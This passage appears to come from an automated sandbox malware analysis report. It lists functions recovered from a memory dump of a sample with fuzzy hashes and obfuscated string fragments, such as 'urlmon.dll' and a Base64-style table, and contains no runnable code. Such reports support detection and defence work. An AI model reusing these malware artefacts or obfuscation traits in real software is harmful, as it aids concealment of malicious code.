                  • Instruction ID: 926767ad274d670eedea00cac2320be2e6ced3d5469cf22d1cef0396b360f5ab
                  • Opcode Fuzzy Hash: 2f1f047b2e39129f1f86205465f6175a89641b909da98a8f732e2418bb9e1e1a
                  • Instruction Fuzzy Hash: 9A1182B63802097BF720AA95DC42FAB375C9BC5B15F244029FB08AA2C1E6A5F81146B4
                  Function 04947A79 Relevance: .1, Instructions: 74COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb26a129de2e797be55eb8f8c4c7eb76019c0b3f6b3e3991ff4875d67a0d8d61
                  • Instruction ID: 94bff5458982240587d2a490cc5e9bc771158f27799ded9742bc82d81407a205
                  • Opcode Fuzzy Hash: eb26a129de2e797be55eb8f8c4c7eb76019c0b3f6b3e3991ff4875d67a0d8d61
                  • Instruction Fuzzy Hash: D0214FB5A00609AFDB10EF98DC41EAF77ACEFC9710F144519F919A7244D770B9118BA1
                  Function 04946F59 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7fbc166882ec4b0ff2a948b0479d638f0dd42687a08fa90bd35cfcceb8b6e128
                  • Instruction ID: 5c64534286ce0f0c92893649d5422aa28a39c4c6b1f745b53cd8065d2ee9d876
                  • Opcode Fuzzy Hash: 7fbc166882ec4b0ff2a948b0479d638f0dd42687a08fa90bd35cfcceb8b6e128
                  • Instruction Fuzzy Hash: 731194B56012146BE710EBE8CC41FABB3ACEFC5704F04451AFA599B244E774790487A1
                  Function 04946DF9 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68c71c70b9abff3a6400cb5734e250b990f3da4031367df7a8a87b4f4fea6d07
                  • Instruction ID: 3b662c8e8f9eb68641b654665de31b08b3a1dc2599898d8c68e38825a824322c
                  • Opcode Fuzzy Hash: 68c71c70b9abff3a6400cb5734e250b990f3da4031367df7a8a87b4f4fea6d07
                  • Instruction Fuzzy Hash: C21151B56006147FE710EBA8CC41FABB3ACEFC5714F444519FA49AB240D7B4B91587A1
                  Function 04947DD9 Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction ID: fff3d2623fff355057f33d67a08b8515c7e1dd9705dfbc0b2a6170c4099b8ec3
                  • Opcode Fuzzy Hash: 70a45c35d8941d98dc1e1da6fba7e6003c86319aac15bde987053209a937adb8
                  • Instruction Fuzzy Hash: 7F019DB6214609BFDB44DE99DC80EEB77ADAFCD714F448219FA09E3241D630F8518BA4
                  Function 04943E19 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 66fa48cf47522d77af00ea8dc41216d16ba6943682557b65c276a070410e2f78
                  • Instruction ID: 993693d5ba20ca6d16d0572ceb47b33fa6cac1632f4b3e0d607337afe38853c4
                  • Opcode Fuzzy Hash: 66fa48cf47522d77af00ea8dc41216d16ba6943682557b65c276a070410e2f78
                  • Instruction Fuzzy Hash: CC01D7B6C01218AFDB50DFE8D9449EEBBF8BB48200F14466AD915F3200F7705A088BA1
                  Function 049236DF Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5fcf813bc6aa1df316adfe20e1c9e674243164f744a91dab0dbb482545eeb1dc
                  • Instruction ID: 200b1454b2333c7dead3ec177a428ea062732a724ad80deac299fed71b05e858
                  • Opcode Fuzzy Hash: 5fcf813bc6aa1df316adfe20e1c9e674243164f744a91dab0dbb482545eeb1dc
                  • Instruction Fuzzy Hash: C1F0E9B36502136BD7205A7DAC81BC6B79CEBC4334F240633F95CC7341D679E45642A0
                  Function 04947059 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7fca821d93e8785011faba77e82fc8df6d39ae2d266b261a8fe7a2952f4becd6
                  • Instruction ID: 648dbcca2edcf85f7235c9a227d30d0e3df500b9e53da386355d04dc60b984c1
                  • Opcode Fuzzy Hash: 7fca821d93e8785011faba77e82fc8df6d39ae2d266b261a8fe7a2952f4becd6
                  • Instruction Fuzzy Hash: D6F01C7A200215BFD710EF99DC41E9B77ADEFC9714F044419FA1897241D670B9118BB4
                  Function 04947CF9 Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction ID: d874878a1756e363cbeaabe6e184c799163221f04cc65c72988446e08dd44ce4
                  • Opcode Fuzzy Hash: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction Fuzzy Hash: B6E06D792003147FE610EE99DC40E9B73ACEFC9714F004019F908A7241D770B81187B4
                  Function 04937589 Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d546659230bf0b880cfb1d82b0ce6dffacfcb78952df54a640702805183dfc1e
                  • Instruction ID: 29d17da27ae02192683700fa7e800bb116e2a2f4a671e7bc356b9994006f6d9f
                  • Opcode Fuzzy Hash: d546659230bf0b880cfb1d82b0ce6dffacfcb78952df54a640702805183dfc1e
                  • Instruction Fuzzy Hash: 9CF08971815109EBDB18CFA4D841BDDB7B4EB45320F1083BDE8189B280D634A7509791
                  Function 04947D49 Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction ID: 2828667be89b3dbc04df75fec751f8fc79c527d6c7347c858e9b1c314d0ef420
                  • Opcode Fuzzy Hash: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction Fuzzy Hash: 1AE01A7A204214BFE714EE99EC45EEB77ACEFC9714F144419FA08A7281D670B9128BF4
                  Function 04949999 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0d7d1f241b9b39758da976e556aba62b8b8826a23ae8093ca9654820bddab7fe
                  • Instruction ID: 8847fa199546bd93d9d2f51e67a853d60be97377c1067b8dba928a3e5017ca1d
                  • Opcode Fuzzy Hash: 0d7d1f241b9b39758da976e556aba62b8b8826a23ae8093ca9654820bddab7fe
                  • Instruction Fuzzy Hash: D0E0867374021437D62069E9DC05F97775CCBC1E70F154075FE0C9B340E661B90182E5
                  Function 04937586 Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7188be8533a92404b12686b301f9a776110fe1c2ec124cdf289fe97694c73514
                  • Instruction ID: 7bfaef6361105b6c5a73264bd90240c9ab4533006986652a02566ca918f569e3
                  • Opcode Fuzzy Hash: 7188be8533a92404b12686b301f9a776110fe1c2ec124cdf289fe97694c73514
                  • Instruction Fuzzy Hash: D1E06571915108EBDB0CCFA4E441B9DB764DB45211F2083B9F819DB280D739EB549751
                  Function 049479D9 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction ID: eaa18a45cc7a6ebceea693a63ccf8d6cedebe81357e1d9947b5c711055506c8d
                  • Opcode Fuzzy Hash: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction Fuzzy Hash: B7E086392402147BE610FB59DC00F9B775CEFC5714F544029FA08A7241CB70B90587F0
                  Function 049498B9 Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a4eb5ba94fc0e1499d15df3b00891cf86836717f8d5fba82d43419959557c2b
                  • Instruction ID: 41a0ff2d4234ad9acec0f6e65318097aa5663ba88d9e953dffdfe14cb1d20804
                  • Opcode Fuzzy Hash: 5a4eb5ba94fc0e1499d15df3b00891cf86836717f8d5fba82d43419959557c2b
                  • Instruction Fuzzy Hash: 2CC012B66103086FEB00EA88CC46F66339C9B88620F4080A1BA0C8B681E6B1B91086A5

                  Non-executed Functions

                  Function 04929999 Relevance: 64.0, Strings: 51, Instructions: 200COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %U$($*$*$*$,$,$:-$=$AJ$A{$B5$F$I|$J$J.$Ko$M$N^$O+$P$Qe$RZ$US$US$U~$V$Y8$\.$\B$a$aj$c$d$f"$jg$m=$n'$nN$p$r$rm$sd$se$wp$z${P$~+$U$o$}
                  • API String ID: 0-2594925837
                  • Opcode ID: 56c1370482bb0434758a592cf4036955ef12aff836d9146180c4f572947434fa
                  • Instruction ID: ccd42d953ced593ce9d477f81da7b70306163e354f7a0f8011ffedbe7cc8b852
                  • Opcode Fuzzy Hash: 56c1370482bb0434758a592cf4036955ef12aff836d9146180c4f572947434fa
                  • Instruction Fuzzy Hash: 15F12AB0905769CBEB608F41C99C7CDBBB1BB45309F1085C9C55C2B281CBBA1AC9CF95
                  Function 0493384B Relevance: 51.4, Strings: 41, Instructions: 169COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                  • API String ID: 0-3248090998
                  • Opcode ID: d87409db08da575ef9f94e893eda0302c64385ea4a9faff98789b080908dbdc7
                  • Instruction ID: 9eeb68c82eab3a4ff5a991b78fa1ffdc1b5734e71b5b43d2c0bbc5868234c2ce
                  • Opcode Fuzzy Hash: d87409db08da575ef9f94e893eda0302c64385ea4a9faff98789b080908dbdc7
                  • Instruction Fuzzy Hash: 22910FF08052A98EDB218F55A4603DFBF71BB95204F1581E9C6AA7B203C3BE4E45DF90
                  Function 04941469 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                  • API String ID: 0-1002149817
                  • Opcode ID: f92cda0865b4a4a2f9ec0963299e2a447cd4cdb7ffbc16669d3682e5a278b9ff
                  • Instruction ID: 61579a448c05701720399fbe786c0d92db57b8aacd5b0621903f84a1128be95a
                  • Opcode Fuzzy Hash: f92cda0865b4a4a2f9ec0963299e2a447cd4cdb7ffbc16669d3682e5a278b9ff
                  • Instruction Fuzzy Hash: A5C121B1D002289EEF60DFA5DD45BEEBBB8AF45304F0081E9E54CAB241D7B55A88CF51
                  Function 0493E911 Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                  • API String ID: 0-3236418099
                  • Opcode ID: 56a5260a841ab50066585741cbd076502c521788a9ef1d173c1fb675085d7807
                  • Instruction ID: e9ad15095a198e3b571368719916fdc072b6b0efb0b2e412597d56d9960e61cf
                  • Opcode Fuzzy Hash: 56a5260a841ab50066585741cbd076502c521788a9ef1d173c1fb675085d7807
                  • Instruction Fuzzy Hash: E79136B1900218AEEB11DFA5DC81FEF77BDEF85705F0441A9E608A6140EBB56B84CF61
                  Function 0493A351 Relevance: 17.7, Strings: 14, Instructions: 175COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 9<U$ $.$F$P$e$i$l$m$o$o$r$s$x
                  • API String ID: 0-3861998862
                  • Opcode ID: 17a8b7259305b265d7f1d5468f9049cccb04f9983133b6f4ec50c6cc3cc7c3b7
                  • Instruction ID: 8726ff447bc7f63711388c41f4e8aa752a56e7fbb5cdd6fc91d063cc95b0ee76
                  • Opcode Fuzzy Hash: 17a8b7259305b265d7f1d5468f9049cccb04f9983133b6f4ec50c6cc3cc7c3b7
                  • Instruction Fuzzy Hash: 3A6122B5D10218AAEB15DBA4CC80FEF777DBF98704F0041ADE609AA140EB7567488FA1
                  Function 0493A359 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                  • API String ID: 0-392141074
                  • Opcode ID: 5f728c733b0e2dc85ae87673849f328e2563a699bf8e0545e9f1814b8c0c463f
                  • Instruction ID: 453f91856cfd7098351793ab7277b09cced1758c3d66b08c9e1256a040d2d16c
                  • Opcode Fuzzy Hash: 5f728c733b0e2dc85ae87673849f328e2563a699bf8e0545e9f1814b8c0c463f
                  • Instruction Fuzzy Hash: FB7110B5D10218AAEB25DBA4CC80FEF777DBF94704F0441ADE609AA140EB756B488F91
                  Function 049356D9 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                  • API String ID: 0-2356907671
                  • Opcode ID: 5e93f0161ee8a6f575ab2ddf2d352a263050e487dfab338986ab61da2d4bce95
                  • Instruction ID: 643041bc59bb5d7a345ffbdfe74849db3edef4d92e520a4507f71d5b027be0d9
                  • Opcode Fuzzy Hash: 5e93f0161ee8a6f575ab2ddf2d352a263050e487dfab338986ab61da2d4bce95
                  • Instruction Fuzzy Hash: E18186B2C003186AEB55EBA4DC80FEF777CAFD4708F0445A9B509A6140EB756798CF61
                  Function 0492E570 Relevance: 13.8, Strings: 11, Instructions: 97COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                  • API String ID: 0-685823316
                  • Opcode ID: 04c75007d91f3a922f4062745ca9dc2899ff9ad848a866cd048ba126901c70da
                  • Instruction ID: 9af754f4373ab54e903b9d0b259a4422d5d9538501bb157de4e081d46b41854c
                  • Opcode Fuzzy Hash: 04c75007d91f3a922f4062745ca9dc2899ff9ad848a866cd048ba126901c70da
                  • Instruction Fuzzy Hash: 053165B5D11218AEEF50DFE4CC44BEE7BF9AF44314F144259E618A6180DBB51A488BA4
                  Function 0493EDC9 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :$:$:$A$I$N$P$m$s$t
                  • API String ID: 0-2304485323
                  • Opcode ID: 19f52f2ed63559ff0823a12e79b85ba9bae8c7a3f74a929e6aff5eabeec3f79c
                  • Instruction ID: 059bc50382c786e0c7ffd90bfc25bcd9ade257924974e169f52c3da58ccd6dd2
                  • Opcode Fuzzy Hash: 19f52f2ed63559ff0823a12e79b85ba9bae8c7a3f74a929e6aff5eabeec3f79c
                  • Instruction Fuzzy Hash: 2DD1F5B2900205ABEB50DFF4CC85FEEB7F9AF99304F14452DE148E6244E7B9A9448B60
                  Function 04926A49 Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &$'$7$8$8$G$T$U
                  • API String ID: 0-2420282021
                  • Opcode ID: 330811c4b1921a13e3cc691bccc77db00a05c7bc175002cc6bad21fc4b1ec922
                  • Instruction ID: 30ac8fdee55efbac1072944a757d7cca339957e9d1b992c3417bd03f8d025387
                  • Opcode Fuzzy Hash: 330811c4b1921a13e3cc691bccc77db00a05c7bc175002cc6bad21fc4b1ec922
                  • Instruction Fuzzy Hash: D6110B20D187CED9DB12CBBC85086AEBF715F23228F4883D994F42B2D2C2754716D7A6
                  Function 04941CB9 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: L$S$\$a$c$e$l
                  • API String ID: 0-3322591375
                  • Opcode ID: 2ffa705ee9a86a4e2293cef324f850af3293aae637beb20f8eafdfdaf47a0939
                  • Instruction ID: 8414ff9dd9636b00f12a0624f0fe57c330a7f4f791ebc3aa9b01cca024793407
                  • Opcode Fuzzy Hash: 2ffa705ee9a86a4e2293cef324f850af3293aae637beb20f8eafdfdaf47a0939
                  • Instruction Fuzzy Hash: 0741A7B2C10218ABDB10DFA8DC89EDFB7B8EFC8714F01466AD51DA7100E77165858BD0
                  Function 0493A107 Relevance: 7.7, Strings: 6, Instructions: 179COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: F$P$T$f$r$x
                  • API String ID: 0-2523166886
                  • Opcode ID: 0db527cb7ce4317479a97020fe2ac37a103b0ce0713c2e226cceafb71cf12d36
                  • Instruction ID: 2d727093a6bd2d58ee0f33facd3773889955d9a6a3e9c71ed70d40eaced9f017
                  • Opcode Fuzzy Hash: 0db527cb7ce4317479a97020fe2ac37a103b0ce0713c2e226cceafb71cf12d36
                  • Instruction Fuzzy Hash: D851E5B1900305ABEB35DFA8CC44FABB7BCEF85309F04466EA54956190E3B4B648CB91
                  Function 04939895 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $i$l$o$u
                  • API String ID: 0-2051669658
                  • Opcode ID: b0dd282c555c1a83c84ba2e5c078469ef37165d7924aaf31d5e21a1fe97ee53c
                  • Instruction ID: e6415093a9fd8df60495a89a7018fe3cde6df38e64cc2a32a90bfc59f83f30d5
                  • Opcode Fuzzy Hash: b0dd282c555c1a83c84ba2e5c078469ef37165d7924aaf31d5e21a1fe97ee53c
                  • Instruction Fuzzy Hash: 966140B6900304AFDB24DBA4CC80FEFB7FDAB89714F104569E51AE7240E775BA408B60
                  Function 04939899 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $i$l$o$u
                  • API String ID: 0-2051669658
                  • Opcode ID: 491f5406a4b95a7caba2ce3b8202b55682fa0a0dd7922e7aefe40db5253c2b79
                  • Instruction ID: 6996e7e8e0c3eea65231079981c69e352fea60a326cca58f6284c5a00573683b
                  • Opcode Fuzzy Hash: 491f5406a4b95a7caba2ce3b8202b55682fa0a0dd7922e7aefe40db5253c2b79
                  • Instruction Fuzzy Hash: 58411EB5900308AFDB20DFA5DC84FEFBBFDEB89704F104569E559A7240D774AA408B61
                  Function 0493952B Relevance: 5.3, Strings: 4, Instructions: 300COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $e$k$o
                  • API String ID: 0-3624523832
                  • Opcode ID: 5f581ada4a1287dc69c89a937b6d3f83bd4004308c40502e5254d295cfe069a0
                  • Instruction ID: 7a110323259d27ad752319dd651579390585a52f64e155bb5bd9ec2417fd5cf0
                  • Opcode Fuzzy Hash: 5f581ada4a1287dc69c89a937b6d3f83bd4004308c40502e5254d295cfe069a0
                  • Instruction Fuzzy Hash: 7AB119B5A00704AFDB24DFA4CC84FEFB7BDAF89704F108559F61AA7284D674AE418B50
                  Function 04939539 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $e$k$o
                  • API String ID: 0-3624523832
                  • Opcode ID: 11c15306edbb66bdeeb65a9340912b30d2d697f41e23ec65fc8f0c5a4a8d3d69
                  • Instruction ID: c49ad355c2bcf156f4bcc9ab9e8693757c202ecb05096f6b43a0290b2443c96b
                  • Opcode Fuzzy Hash: 11c15306edbb66bdeeb65a9340912b30d2d697f41e23ec65fc8f0c5a4a8d3d69
                  • Instruction Fuzzy Hash: BF612FB5A00704AFDB24DFE4CC84FDFB7BDAF89704F104558A619AB244D770AA41CB50
                  Function 049393EB Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                  • API String ID: 0-2877786613
                  • Opcode ID: 99dbe433e699e59aea7a5b624db7a438143649fabd60635e0e258ac5d2723d6a
